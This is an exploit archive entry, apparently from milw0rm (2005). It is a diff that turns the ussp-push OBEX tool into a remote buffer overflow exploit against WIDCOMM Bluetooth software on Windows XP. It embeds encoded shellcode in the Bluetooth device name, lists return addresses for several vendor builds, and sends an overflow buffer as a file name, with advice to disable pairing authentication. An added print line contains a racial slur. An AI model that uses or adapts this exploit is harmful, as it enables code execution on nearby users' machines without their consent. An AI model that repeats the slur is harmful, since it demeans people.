WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow Exploit

                                                --- ussp-push-0.4/obex_main.c	2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c	2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
 /*
+   http://www.digitalmunition.com
+   Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. 
+   http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
  * UNrooted.net example code
  *
  * Most of these functions are just rips from the Affix Bluetooth project OBEX
@@ -62,7 +68,10 @@
 
 #include "obex_socket.h"
 
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
 #define BT_SERVICE "OBEX"
 #define OBEX_PUSH        5
 
@@ -316,6 +325,9 @@
 	switch (event)  {
         case OBEX_EV_PROGRESS:
 		printf("Made some progress...\n");
+		sleep(3);
+		printf("Peace nigga...\n");
+		exit(0);
 		break;
 
         case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
 	name = remote;
 
 	name_len = (strlen(name)+1)<<1;
-	if( (namebuf = g_malloc(name_len)) )    {
-		OBEX_CharToUnicode(namebuf, name, name_len);
-	}
+	namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. 
 
 	buf = easy_readfile(path, &file_size);
 	if(buf == NULL) {
@@ -424,6 +434,24 @@
 	return err;
 }
 
+static void set_device_name(int ctl, int hdev, char *opt)  // Johnh as usual... 
+{
+         int s = hci_open_dev(hdev);
+
+         if (s < 0) {
+                 fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+                                                 hdev, strerror(errno), errno);
+                 exit(1);
+         }
+         if (opt) {
+                 if (hci_write_local_name(s, opt, 2000) < 0) {
+                         fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+                                                 hdev, strerror(errno), errno);
+                         exit(1);
+                 }
+	}
+
+}
 
 /*
  * That's all there is to it.  With it all setup like this all I have to do
@@ -434,19 +462,87 @@
 
 int main( int argc, char **argv )
 {
-	if ( argc != 4 ) {
-		printf("%s\n\n"
-		       "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
-		       "\tDEVICE        = RFCOMM TTY device file\n"
-		       "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
-		       "\tLFILE         = Local file path\n"
-		       "\tRFILE         = Remote file name\n\n",
-		       UPUSH_APPNAME, argv[0]);
+/* 
+	The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+       # Authentication and Encryption (Security Mode 3)
+        auth disable;
+        encrypt disable;
+*/
+
+	struct
+	{
+  		char *os;
+  		u_long ret;
+	}
+ 	targets[] =
+ 	{
+  		{ "[ XP Pro SP0   - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+  		{ "[ XP Pro SP0   - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+  		{ "[ XP Pro SP0   - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+  		{ "[ XP Pro SP1a  - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+  		{ "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+  		{ "[ Crash ]", 0x41424344 },
+	}, v;
+
+	if ( argc != 3 ) {
+		printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE        = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET 	= Target number\n",UPUSH_APPNAME,argv[0]);
+		printf("Types:\n");
+		int i;
+  		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+  		printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
 		return( -1 );
 	}
 
-	printf( "pushing file %s\n", argv[2] );
-	if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+	/* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+	/* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+	/* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ 
+	/* this still crashes the BTStackServer.exe... but oh well */
+	unsigned char scode[] = 
+	"\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+	"\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+	"\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+	"\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+	"\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+	"\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+	"\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+	"\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+	"\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+	"\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+	"\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+	"\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+	"\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+	"\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+	
+	set_device_name(0,0,scode);
+	//printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+	//printf( "pushing file.\n");
+
+	char buf[3000];
+	memset(buf,'\0',sizeof(buf));
+	memset(buf,'Z',3); // Sometimes u need 3 z's 
+
+        int type = atoi(argv[2]);
+        if(type)
+        {
+        	printf("[-] Selected target:\n");
+              	printf("    %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);              
+        }
+
+	int x;
+	for(x=0; x<=122; x=x+1)
+	{
+    		memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+	}
+	// Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+	if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+		printf( "error\n" );
+		return( -1 );
+	}
+	printf("\nsleeping 3 seconds before triggering the shellcode\n"); 
+	sleep(3);
+	if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
 		printf( "error\n" );
 		return( -1 );
 	}

// milw0rm.com [2005-12-04]